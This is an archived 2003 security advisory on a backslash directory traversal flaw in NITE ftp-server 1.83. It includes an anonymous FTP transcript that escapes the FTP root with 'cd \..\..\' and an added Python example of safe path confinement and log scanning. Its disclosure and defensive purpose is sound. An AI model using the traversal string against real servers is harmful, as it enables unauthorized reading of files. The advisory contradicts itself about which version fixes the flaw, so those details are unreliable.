Vulnwatch: Directory traversal vulnerabilities found in NITE ftp-server version 1.83

Directory traversal vulnerabilities found in NITE ftp-server version 1.83

From: <matrix_at_infowarfare.dk>
Date: Wed, 15 Jan 2003 13:10:46 +0100

                 Directory traversal vulnerabilities found in
                        NITE ftp-server version 1.83
                                                         
                           Discovered by Dennis Rand
                            www.Infowarfare.dk
------------------------------------------------------------------------

SUMMARY

The NiteServer is a simple FTP server program with some special features.
It is free and easy to use.
The following commands are recognized:
USER, PORT, RETR, REST, PASS, STOR, CWD, DELE, HELP, LIST,
so it should work with any usual FTP client.
Special download-ratio features are implemented.
User logins are logged with their IP number, so the up/download ratio
is kept for the future. Spy on users and watch what they are up- or downloading.
Are you interested in learning Visual Basic Internet programming?
Do you need some different features?
You can purchase the source code (VB 6.0) from the author.
Simply send a check about 25 US-$ to

A directory traversal vulnerability in the product allows remote attackers to
cause the server to traverse into directories that reside outside the bounding
FTP root directory.

DETAILS

Vulnerable systems:
 * Niteserver Version:1.83 - Author:Thomas Krebs
   (tested on Windows NT 4.0 and Windows 2000 Server, fully patched)

Immune systems:
 * NiteServer version 1.85

NiteServer's failure to filter out "\.." sequences in command requests allows
remote users to break out of the restricted directory and gain read access
to the system directory structure, making it possible to discover the directory
structure outside the configured areas. Note in the transcript below that the
forward-slash forms ("cd /" and "cd ..") are refused, while the backslash form
("cd \..\..\") is accepted and lands in the drive root.

The following transcript demonstrates a sample exploitation of the
vulnerabilities:

Connected to 192.168.1.22.
220- Niteserver Version:1.83
220- Author:Thomas Krebs
220- email: turtie_at_knuut.de
220- Welcome to the Niteserver
220- First Author:Thomas Krebs!
220-
220
User (192.168.1.22:(none)): anonymous
331 User anonymous accepted, send password.....
Password:
230 User anonymous accepted, ok come on.....
ftp> ls
200 PORT command ok....
257 "c:/ftpd/data" is working directory...c:\ftpd\data
ftp> cd /
250 Directory changed to"c:\ftpd\data" .
ftp> cd ..
250 Directory changed to"c:\ftpd\data" .
ftp> cd \..\..\
250 Directory changed to"c:\" .
ftp> ls
200 PORT command ok....
257 "c:/" is working directory...c:\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler til Windows Update
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
-rwxr-xr-x 1 User Group 134217728 Dec 30 15:24 pagefile.sys
drwxr-xr-x 1 User Group 0 Dec 30 15:19 Program Files
drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
drwxr-xr-x 1 User Group 0 Dec 24 00:08 TEMP
drwxr-xr-x 1 User Group 0 Dec 30 16:30 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec.
ftp> bye
221 Goodbye.

Detection:
Niteserver Version:1.83 is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above
transcript.
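The following is an added example written for this archive page; it is not NiteServer's code and makes no claim about how that server is implemented. It illustrates the two points above: why a traversal filter that only understands one separator lets a backslash-delimited "\..\..\" request through (the weak check is constructed to reproduce the transcript's outcomes), how a canonicalising check confines every CWD/RETR path to the configured FTP root, and how a defender can flag traversal attempts in a command log. The root directory c:\ftpd\data is taken from the transcript; the log format and the sample log lines are constructed.

```python
"""Added example (not NiteServer's code): separator-naive traversal filtering
versus a canonicalising root check, plus a simple log scanner."""
import ntpath

# Root taken from the transcript's "257 ... is working directory" reply.
FTP_ROOT = "c:\\ftpd\\data"


def naive_resolve(root, cwd, requested):
    """Weak filter, constructed to show the failure class in the advisory.

    It only recognises '..' between forward slashes, so 'cd ..' and 'cd /' are
    handled (the request is ignored or mapped to the root, as in the transcript),
    while the backslash form '\\..\\..\\' passes the check unchanged. The path
    library then treats the leading backslash as the drive root and collapses
    the request to 'c:\\', which is exactly what the transcript shows.
    """
    req = requested.strip("/")
    if req == "":
        return root                      # 'cd /' -> FTP root
    if ".." in req.split("/"):
        return cwd                       # 'cd ..' -> request ignored
    return ntpath.normpath(ntpath.join(cwd, req))


def safe_resolve(root, cwd, requested):
    """Canonicalise a CWD/RETR argument against the FTP root and confine it.

    Both '/' and '\\' are treated as separators, a leading separator means the
    FTP root (never the drive root), a drive-qualified path is resolved and then
    judged like any other, and the result is accepted only if it is the root or
    lies strictly beneath it. Returns None when the request would escape.
    """
    root_n = ntpath.normcase(ntpath.normpath(root))
    req = requested.replace("/", "\\")
    if req.startswith("\\"):
        base, req = root_n, req.lstrip("\\")
    else:
        base = ntpath.normcase(ntpath.normpath(cwd))
    candidate = ntpath.normcase(ntpath.normpath(ntpath.join(base, req)))
    # Prefix test includes the trailing separator so 'c:\ftpd\data2' is not
    # mistaken for a child of 'c:\ftpd\data'.
    if candidate == root_n or candidate.startswith(root_n + "\\"):
        return candidate
    return None


def is_traversal_attempt(arg):
    """True when any component of an FTP argument is '..', whichever separator is used."""
    return ".." in arg.replace("/", "\\").split("\\")


# Constructed sample log: '<client> <command> <argument>' per line (hypothetical format).
SAMPLE_LOG = """\
192.168.1.22 CWD /
192.168.1.22 CWD ..
192.168.1.22 CWD \\..\\..\\
192.168.1.22 RETR pub/readme.txt
192.168.1.22 RETR ..\\..\\AUTOEXEC.BAT
"""

# Commands from the server's own list that carry a path argument.
PATH_COMMANDS = ("CWD", "RETR", "STOR", "DELE", "LIST")


def flag_traversal(log_text):
    """Return the log lines whose path argument contains a '..' component.

    A '..' issued from inside a subdirectory is legitimate, so these are
    candidates for review; the authoritative decision belongs to safe_resolve,
    which knows the client's current directory.
    """
    hits = []
    for line in log_text.splitlines():
        parts = line.split(" ", 2)
        if len(parts) == 3 and parts[1] in PATH_COMMANDS and is_traversal_attempt(parts[2]):
            hits.append(line)
    return hits


if __name__ == "__main__":
    for req in ("/", "..", "\\..\\..\\", "pub/../pub"):
        print(f"{req!r:16} naive -> {naive_resolve(FTP_ROOT, FTP_ROOT, req)!r:22} "
              f"safe -> {safe_resolve(FTP_ROOT, FTP_ROOT, req)!r}")
    for hit in flag_traversal(SAMPLE_LOG):
        print("traversal candidate:", hit)
```

On a real server the confinement test should be repeated on the path the operating system actually opens (after junctions, reparse points and short 8.3 names are resolved), because canonicalising the string alone does not account for those.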

Vendor response:
Niteserver Version:1.83 fixes this issue. The latest version is
available from come.to/niteserversite

Disclosure timeline:
12/12/2002 Found the Vulnerability.
12/12/2002 Author notified (turtie_at_knuut.de)
01/13/2003 No Responses received from turtie_at_knuut.de
01/13/2003 Public Disclosure.

ADDITIONAL INFORMATION
The vulnerability was discovered by <mailto:matrix_at_infowarfare.dk> Dennis Rand

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.

Received on Jan 15 2003
